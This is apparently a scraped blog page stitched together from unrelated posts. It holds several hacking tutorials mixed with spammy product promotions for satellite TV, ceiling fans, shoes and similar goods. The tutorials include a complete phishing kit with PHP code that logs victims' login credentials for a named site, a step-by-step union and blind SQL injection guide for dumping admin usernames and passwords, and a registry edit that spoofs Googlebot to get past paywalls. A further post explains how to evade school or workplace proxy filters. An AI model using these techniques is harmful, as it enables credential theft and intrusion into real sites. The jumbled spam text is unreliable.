Secret Backdoor To Many Websites

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....

The lesson you should have learned here is: Obviously Google can go where you can't.

Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE.

In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.
Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.

How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

CODE
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"

Voila! You're done!

You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

CODE
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Ps:
Opera allows for on-the-fly switching of User Agents through its "Browser Identification" function, while for Mozilla/FireFox browsers a switching utility is available as an installable extension

How to Make A Basic Phisher

This is a step by step tutorial on how to make a phishing page to get account information for various websites from many people. This is only how to make the page, but it is up to you to decide how you are going to get people to fall for it.

1. For this tut, we will use rapidshare.com as our page that we would like to make a phisher of.

2. Go to http://www.rapidshare.com and navigate to the premium account log-in screen at the url : https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi

3. We will now begin to make our phisher. Start by right clicking on the page and click view source.

4. Select all and paste into a notepad document.

5. You should see a bunch of random html coding, but we are only interested in two words: method and action.

6. Do a search in the document for the word "method" (without quotes).

7. Your result should be something like : method="post"

8. Change the word post to the word get.

9. Now do a search for the word "action" (without quotes). action is usually very close to method so you may not even have to do a search for it.

10. You should see something like this: action="https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi"

11. Where the url in between the quotes is, replace the text with next.php so the new part says: action="next.php"

12. Save this file as index.html and create a new document on notepad.

13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.

14. Copy and paste this code into the notepad document:

CODE
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: Put your REDIRECT URL Here");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>

15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:


CODE
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>

16. Save this file as next.php and open up a new notepad document.

17. Save this document as password.txt. The file that you need to save it as is in the next.php file right here:
$handle = fopen("password.txt", "a");
I chose password.txt as my file where I want the passes to be stored, but you can change it to anything you want.

18. Go to a free web hosting client that supports php files, my personal favorite is freeweb7.com, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.

19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.

Happy Phishing Guys!!!

Full SQL Injection Tutorial (MySQL)

In this tutorial i will describe how sql injection works and how to
use it to get some useful information.

First of all: What is SQL injection?
It’s one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc…(in shortly).

1.SQL Injection (classic or error based or whatever you call it)
2.Blind SQL Injection (the harder part)

So let’s start with some action

1). Check for vulnerability
Let’s say that we have some site like this
http://www.site.com/news.php?id=5
Now to test if is vulrnable we add to the end of url ‘ (quote),
and that would be http://www.site.com/news.php?id=5′
so if we get some error like
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something similar
that means is vulrnable to sql injection

2). Find the number of columns
To find number of columns we use statement ORDER BY (tells database how to order the result)
so how to use it? Well just incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <– no error
http://www.site.com/news.php?id=5 order by 2/* <– no error
http://www.site.com/news.php?id=5 order by 3/* <– no error
http://www.site.com/news.php?id=5 order by 4/* <– error (we get message like this Unknown column ‘4′ in ‘order clause’ or something like that)
that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function
With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works

4). Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try –
it’s a comment and it’s important for our query to work properly.
let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
if you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
i didn’t see any paper covering this problem, so i must write it
what we need is convert() function
i.e.
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version

5). Getting table and column name
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…) <— later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s …
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…
i.e would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good :D)
we know that table admin exists…
now to check column names.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc…
now to check if column password exists
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1…
now we must complete query to look nice
for that we can use concat() function (it joins strings)
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(username,0×3a,password),3 from admin/*
Note that i put 0×3a, its hex value for : (so 0×3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get dislayed username:password on screen, i.e admin:admin or admin:somehash
when you have this, you can login like admin or some superuser
if can’t guess the right table name, you can always try mysql.user (default)
it has user i password columns, so example would be
http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,password),3 from mysql.user/*

6). MySQL 5
Like i said before i’m gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.
for third table we put limit 2,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc…
To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
the first column is diplayed.
the second one (we change limit 0,1 to limit 1,1)
ie.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
the second column is displayed, so keep incrementing until you get something like
username,user,login, password, pass, passwd etc…
if you wanna display column names for specific table use this query. (where clause)
let’s say that we found table users.
i.e
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*
now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won’t work if the magic quotes is ON.
let’s say that we found colums user, pass and email.
now to complete query to put them all together
for that we use concat() , i decribe it earlier.
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,pass,0×3a,email) from users/*
what we get here is user:pass:email from table users.
example: admin:hash:whatever@blabla.com
That’s all in this part, now we can proceed on harder part

2. Blind SQL Injection
Blind injection is a little more complicated the classic injection but it can be done
I must mention, there is very good blind sql injection tutorial by xprog, so it’s not bad to read it
Let’s start with advanced stuff.
I will be using our example
http://www.site.com/news.php?id=5
when we execute this, we see some page and articles on that page, pictures etc…
then when we want to test it for blind sql injection attack
http://www.site.com/news.php?id=5 and 1=1 <— this is always true
and the page loads normally, that’s ok.
now the real test
http://www.site.com/news.php?id=5 and 1=2 <— this is false
so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version
to get the version in blind attack we use substring
i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works
when select don’t work then we use subselect
i.e
http://www.site.com/news.php?id=5 and (select 1)=1
if page loads normally then subselects work.
then we gonna see if we have access to mysql.user
i.e
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names
This is part when guessing is the best friend
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one
let’s say that we have found that table name is users, now what we need is column name.
the same as table name, we start guessing. Like i said before try the common names for columns.
i.e
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)

4). Pull data from database
we found table users i columns username password so we gonna pull characters from that.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ascii converter we know that char(99) is letter ‘c’.
then let’s check the second character.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),2,1))>99
Note that i’m changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>105
FALSE!!!
we know that the second character is char(105) and that is ‘i’. We have ‘ci’ so far
so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i’m doing everything manually,
cause that makes you better SQL INJECTOR
Hope you learned something from this paper.
Have FUN!

When life is more advanced and modern, the people in the United States continue to develop the functions of live entertainment in the home. With a comfortable seat, and with variety of features that can be adapted to any weather, they watching the digital satellite television broadcasting. So no wonder when they subscribe to satellite television, such as Direct TV.

American people, always want to be facilities and entertainment devices such as DirectTV can have on their respective homes. For entertainment in your home, for a quick source of information in your home, attach Satellite Directv. After DirectTV installed in the house, you can enjoy more than 130 HD television channels through Direct TV device that can be adjusted with the navigation system functions. With satellite technology, not cable technology, Satellite DirectTV make a good for you. Direct TV has to be choice over 17 million families in the United State, so do not hesitate to install Direct TV.

Direct T V has features crystal clear HD channels Dolby Digital 5.1 surround sound and 100% digital quality for every channel. They offers incredible value with lower price per channel. For the eight year in a row, DirectTV scored higher in customer satisfaction measured in the American Customer Satisfaction Index.

As we know, the fan functioned as air conditioning, ventilation and air fresher (exhaust fan). The popularity of the fan, apparently, still do not fall off, even air conditioning device (Air Conditioner) continue to increase. The use of a large power, and the price of Air Conditioner (AC) is still high, causing many people to choose the fan as a 'remover' hot air. Install a fan is as the most economical alternative to create air circulation in the house.

Unlike the AC, the technology on the fan, generally more forward of the strength of the wind blowing aspects and the air flow. Strength of the blast is affected by the diameter rotor, motor and fan that used. If you like to using fans for your home, many types and models of the fans such as ceiling fans that are usually installed in the ceiling or roof space. This fan has a rotor which is very varied, from 12 inch-60 inch and is generally installed in the room or open space as a vast living room, hall, building, and so forth. This type of fan is hanging on the ceiling house, while the on-off switch is also hanging, or placed on the wall that can be set slow rotation up to high rotation.

It important to consider when selecting a fan is select products that already have a good reputation, because they usually will choose a good quality material. With good material / environment friendly (RoHS Free) air quality in the surrounding areas will be good. For products with good reputation you can click here http://www.farreys.com. They offers thousands of unique ceiling fans and ceiling fan accessories from more than a dozen popular ceiling fan manufacturers. Farreys.com provides many brands such Casablanca ceiling fans, Craftmade ceiling fans, Ellington ceiling fans, Fanimation ceiling fans, Hunter Fan Company, Luceplan ceiling fans, Matthews Fans, Minka Aire ceiling fans, Modern Fan Company, Monte Carlo ceiling fans, NuTone ceiling fans, Quorum ceiling fans and Westinghouse ceiling fans. You may shop by ceiling fan brand or by ceiling fan style. Their ceiling fan customization system assists in configuring and ordering ceiling fans to exact specifications with all accessories. Their ceiling fan search tool quickly helps find the perfect fan for your application.

So many cooking equipment in the kitchen will not make harmonious. Due to busy, usually the cookwares are disorganized, so that make the kitchen is not comfortable and also make an impression a narrow kitchen.

Thus, like the other rooms, the kitchen should be also configured in such a way so that the people who are there to be comfortable. It is therefore necessary enclume pot racks to put the cooking equipment in the kitchen. With the rack in the kitchen we can save variety of equipments, equipment eating and drinking, the food itself, the materials also cooking equipment. The variety of goods need storage such enclume pot rack which makes a kitchen clean and hygienic.

The need for a rack, put the cooking equipment such as cabinet, fan or pot, many selection of basic material and finishing, usually from wood or metal. Wood or metal is not the problem, which is important, clean and hygienic. Problem in price, can be customized with your finances. Once again, in choosing enclume potracks is consider how big the kitchen space, so it will not make the narrow kitchen.

For reference, if you want to buy enclume potracks, there is an online shopping PotRackIxchange.com. Potrack Exchange bring exclusive hand-wrought kitchen wares right to your doorstep. You can making purchase online by place order in your shopping cart. And not long after you make a deal, Potrack Exchange will shipping your order.

Watching movie, surely become of fun for all family. Moreover watching the movie through a broadcasting satellite, such as High Definition TV service from direct satellite tv. With High definition TV from Direct TV, this will add enjoyment to the movies.

If you often watch movies, of course, know the famous actor Brad Pitt. Yes, Brad Pitt who have born the name William Bradley Pitt, born in Shawnee, Oklahoma on December 18, 1963.

Pitt's popularity begins role as JD in the TV serial, THELMA & LOUISE in 1991, with Susan Sarandon and Geena Davis.

Pitt is now a life asmaranya with top celebrity Angelina Jolie, after leaving his wife, actress Jennifer Aniston.

Farewell Aniston-Pitt after Pitt's going to 'love' with Jolie while shooting the film, MR. AND MRS Smith in 2004.

Besides Aniston and Jolie, some women have been the girlfriend of Pitt, among them are actress Gwyneth Paltrow, Juliette Lewis and Robin Givens.

Together Jolie, Pitt get the first child on 27 May 2006 and given the name Nouval Shiloh Jolie-Pitt. Besides Shiloh, there are still children of adoption Jolie, Maddox and Zahara.

Pitt and Jolie adopted a child again from Vietnam in March 2007, a son aged three years and given the name Pax Thien Jolie-Pitt. The family more busy, when on 12 July 2008 Jolie re-birth twin babies were given the name Knox Leon and Vivienne Marcheline in France.

Pitt acting quality is considered again, after he portray well figure Benjamin Button, in the movie 'THE CURIOUS CASE OF BENJAMIN BUTTON'. Even through its role in this newest film, Pitt nominated as best actor in the Oscar trophy.

I proudly present this post as fan of Brad Pitt, and I wish you know this my post can win the BoB Awards held by DirectSatTV.com. So, Please nominate me in the Best of the Best Awards.

Now many companies that appear to web hosting services. Each web hosting service providers compete to offer better service and features a complete, and the cheap cost. Choosing a web hosting seems to be that easy, of course you must be careful in choosing a web hosting provider. Many web hosting facilities that offer nearly unlimited and the price is very cheap, indeed this is not good for your site because there are limited due to server and network infrastructure, data center itself. Server that filled with many high traffic sites that will cause the server load increases, a result, your site is difficult to access or down frequently.

In choosing a web hosting service, make sure that services have a name and clear information such as address, phone number, the name of the owner. If necessary, please contact directly to the phone number listed there just for ask. Once you find a hosting service there is vagueness things like the above, should not use the services because of their vagueness, there are indications fraud.

Validity and clarity hosting service is the most important thing. Once a hosting service is invalid or does not clear, it is also all of the parameters will not be good. In addition, if necessary, try to see the age of the web hosting services. How many years he was already running. The old age, then hopefully the more experienced in the hosting.

If you want to choose a web hosting provider which is top quality for your website, WebHostingGeeks.com has did executed web hosting reviews, ratings and awards, so you will get quality web hosting providers here. Do not hesitate when choosing web hosting providers, only WebHostingGeeks.com was choosing the best for you.

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.

1. Direct connections via the Internet

These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield’s Port Report shows just how many systems are sitting out there waiting to be attacked. I don’t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.

2. Vulnerability scanning

Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.’s NGSSquirrel for SQL Server (for database-specific scanning). They’re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

Figure 1: Common SQL injection vulnerabilities found using WebInspect.

This is the First Question that arises in our mind when we use the Proxy Servers for Surfing the Internet without revealing our Identity to Others. Here all these mindboggling questions are answered with easy to understand examples.

The exchange of information in Internet is made by the “client - server” model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server.

What your browser transmits to a web-server:

* name and a version of an operating system
* name and a version of a browser
* configuration of a browser (display resolution, color depth, java / javascript support, …)
* IP-address of a client
* Other information

The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:

* country where you are from
* city
* your provider?s name and e-mail
* your physical address

Information, transmitted by a client to a server is available (accessible) for a server as environment variables. Every information unit is a value of some variable. If any information unit is not transmitted, then corresponding variable will be empty (its value will be undetermined).

These are some environment variables:

REMOTE_ADDR ? IP address of a client

HTTP_VIA ? if it is not empty, then a proxy is used. Value is an address (or several addresses) of a proxy server, this variable is added by a proxy server itself if you use one.

HTTP_X_FORWARDED_FOR ? if it is not empty, then a proxy is used. Value is a real IP address of a client (your IP), this variable is also added by a proxy server if you use one.

HTTP_ACCEPT_LANGUAGE ? what language is used in browser (what language a page should be displayed in)

HTTP_USER_AGENT ? so called “a user?s agent”. For all browsers this is Mozilla. Furthermore, browser?s name and version (e.g. MSIE 5.5) and an operating system (e.g. Windows 98) is also mentioned here.

HTTP_HOST ? is a web server?s name

This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, …). Their quantity can depend on settings of both a server and a client.
[eminimall]
These are examples of variable values:

REMOTE_ADDR = 194.85.1.1
HTTP_ACCEPT_LANGUAGE = ru
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5

Anonymity at work in Internet is determined by what environment variables “hide” from a web-server.

If a proxy server is not used, then environment variables look in the following way:

REMOTE_ADDR = your IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

According to how environment variables “hided” by proxy servers, there are several types of proxies
Transparent Proxies

They do not hide information about your IP address:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = your IP

The function of such proxy servers is not the improvement of your anonymity in Internet. Their purpose is information cashing, organization of joint access to Internet of several computers
, etc.
Anonymous Proxies

All proxy servers, that hide a client?s IP address in any way are called anonymous proxies

Simple Anonymous Proxies

These proxy servers do not hide a fact that a proxy is used, however they replace your IP with its own:
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = proxy IP

These proxies are the most widespread among other anonymous proxy servers.

Distorting Proxies

As well as simple anonymous proxy servers these proxies do not hide the fact that a proxy server is used. However a client?s IP address (your IP address) is replaced with another (arbitrary, random) IP:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = random IP address
High Anonymity Proxies

These proxy servers are also called “high anonymity proxy”. In contrast to other types of anonymity proxy servers they hide a fact of using a proxy:

REMOTE_ADDR = proxy IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

That means that values of variables are the same as if proxy is not used, with the exception of one very important thing ? proxy IP is used instead of your IP address.
Summary

Depending on purposes there are transparent and anonymity proxies. However, remember, using proxy servers you hide only your IP from a web-server, but other information (about browser configuration) is accessible!

Lot´s of people complain that Web Proxys are not working at their Works / Schools computer because they have been banned by administrators. A way around this would be to setup your very own proxy server that is being hosted a) by a free web hosting service that supports either php or cgi or b) your own website that is being hosted by a web hosting company.

Both methods should work and I will walk you right through the installation process for both scripts and give you tips how to find out what is actually being blocked. Before we start you need to download a copy of phpproxy or cgiproxy depending on what you want and can use. You also could perform a search for free web hosting on google for instance and try to find a web host that supports one of the two languages, a good site that I found while searching for those terms might be freewebspace.net

1. phpproxy

Download phpproxy and unpack it to a local directory on your hard drive. All you need to do know is to upload the script to your webspace and open up the new url to check if its working allright. You might want to rename the file to something different, something that does not contain the word proxy in it to avoid filters that ban everything that has the word “proxy” in it.

You could open up the script and enter your clients ip in there to make sure that only your client will be able to connect or you could add a .htaccess file to the directory forcing everyone who wants to start the script to enter a username and password. Again, use google if you like to find out more information about .htaccess

The php script has some requirements, make sure you read the readme file which is included and check to see if your hoster has those requirements enabled.
[eminimall]
2. cgiproxy

Your hoster has to have cgi enabled in order to run this script. Many free hosters do not offer cgi or only some preinstalled scripts. Make sure it is enabled before you start the installation process.

First, download the source and unpack it to a local directory.

Now, open the .cgi file and take a look at the configuration. You can edit lots of settings from within, for example you could configure the script that way that it only allows text to go through the proxy but no images. Everything is explained in detail and all options are explained with comments, browse through the file, edit the options to your liking and save the new file.

After that upload the script to your cgi directory if that is required by your hoster and open the url from your browser. You are now ready to browse the web anonymously, to check if that is really the case load a website like whatismyip.com as the first site and check if the ip matches with the server the script is installed and not your computers ip. If that is the case you´ve done everything right and can surf anonymously. (there are still ways to find out your ip, just in case you are wondering)

3. What is being blocked ?

a) If you can access the proxy from the client they only block domains / ips.
b) If you can´t access the proxy they might be banning filenames that contain proxy as well, try changing the filename.

For all women appear to be slim and sexy longed never retrograde in their lives. There are many ways that women do look attractive slim. In addition to the way diet, exercise or perform treatment to get their ideal body, a slim section, which is not less important is to do tricks or tactics in the case of dress.

To be more slim look, choose the clothes with similar color and avoid large patterns. We recommend for flamboyant clothes, select the texture that makes the body appear more high. Choose clothing that has not a lot of buttons and accessories. Do not buy clothes that are too small or greatness. Select a V-shaped collar to effect elongate the body. When wearing the shirt, leave some of the top button, open. Use the vertical line patterns. Vertical or diagonal line that is not too close more profitable. Style stretching down make you look more slim.

As the vest, coat, cardigan below the hip, and select the piece that do not quite loose fitting body. To coat, choose a single-breasted.

Select the skirt have the A-line, the span is not too tight and without bags. Grown long in the bottom right knee.

Choose the right pants and avoid ploi from the side, back and also the rubber. We recommend wearing shorts without pockets. Wear shorts in the works as a corset so that flat stomach look.

So that the legs appear longer, adjust color skirt, stocking and shoes. Use dark color stocking so that decrease effect of fat on the legs. Avoid the big shoes and be entitled to narrow. Select the edges out, but the heel not too large.

If you need some advice try visit Clothing Accessories Buying Guide from Shopwiki.com. Here offered many products like clothing and accessories from many stores that gathered by Shopwiki.com. You can select the products and making purchase by order online.

When you receive call to your home and do not know who is behind it, that is a good time to resort to national phone listing reverse look up service. If you're still hesitant to use one, there is NationalPhoneListings.org, the most reliable source for getting information about an unknown phone number that has called you.

Although there are a number of these services available, NationalPhoneListings.org is legitimate organizations that have spent a lot of time and effort to put together their databases of contact information. They do charge quite a bit for the service they offer but it's a service in demand and one that isn't free for them to provide.

Millions of national phone listings are stored in the databases compiled by this web sites. That means if you opt to do the search and pay the fee you stand a pretty good chance of getting the information you want. The information may not always be accurate because keeping all of those millions of pieces of data up-to-date would be an enormous task that would require even higher fees. However, you can usually use the information you are given to track down the people; it just might take a few extra steps.

NationalPhoneListings.org offer telephone reverse look up services do offer guarantees on their services. If you can't find the information you want, some of the sites will do a manual search at no additional cost to help you track down the details. Others will give your money back or will give you a credit to do a future search for free.

If you want to find out who is beyond a phone call using
NationalPhoneListings.org services is the best option you have available. To access the easiest to use tool to perform a reverse national phone numbers listings lookup all you have to do is visit NationalPhoneListings.org.

Right now there are many social networks on the net, but which ones you join? If you like share and connect with friend or people anywhere in the world based on "Stuff" that you buy or use everyday, you should join with Acobay.com. Acobay is a brand new and unique social network site. If you have similar interests, you can share here with other people. Here you can also learn about the most popular products available today. Acobay lets you share all of your cool stuff with the world. You tell the community how much it is, why you like it or sometimes even why you don't like it. You can upload photos of your new stuff.

Become a member of the Acobay is easy. You just register an account for free, and then fill about me, after that you can share as many stuff as you like. Checkout the discussion, where you can ask the other owners how-to questions, find out information about the place in your area, make friends with people who have similar stuff and discover a new author that others in your network may be reading. I suggest you to try all the features, it’s really fun. Many categories that offered by Acobay such Pet network, Auto network, Movie network, Book network, Computers, Software, and many more.

As a member of Acobay you can promote your own blog by sharing Blogging (under anything category). The more "stuff" you share, the more people you connect and the better Acobay works for you. By doing all these, you can help buzz Acobay and expected to make the Acobay the hottest social site for 2009!

Running is one of the sports that we can do without having to spend a lot of money. It also can make the body much more healthy. But sport activities without supported good nutrition such energy bar or sports drinks will not be balanced, it will cause the body's metabolic system is not running according to the track.

In addition to running, walking offers the best combination in sports activities and can be done with convenience at every opportunity for various reasons. Walk activity to help prevent or treat chronic diseases. A pedometer can help count the number of steps per day. The recommended amount is usually around 10,000 steps. But other than the pedometer, the equipment for walking is a pair of shoe, not need any special equipment.

If you want to buy running shoes please choose the appropriate type with your feet and make sure that the size is really in line with your foot. The selection of appropriate sports shoes is important. Sol in the shoes must have the ability to protest in accordance with the exercise, because the shoe sole function as a cushion. Shoes like shock breaker in the car, whose function ease shocks when moving.

Now consumers find that purchasing shoes online has several major advantages. With the more what is called the online store to compete for this business, consumers who have come so clear winner!

Now possible to see the shoes from all major manufacturers product lines right from the comfort of your own home on the website ShopWiki.co.uk. Many of the online shoe store is found based on the brand and type of shoes.

No need to waste valuable hours of time and precious fuel traveling from one store to another. Online shoe store that can be easily accessed twenty four hours a day directly from your home computer. With a mouse click, you can find many famous brand shoes such Nike, Asics, Reebok, Adidas, etc. You will find the type and style you're looking for quickly.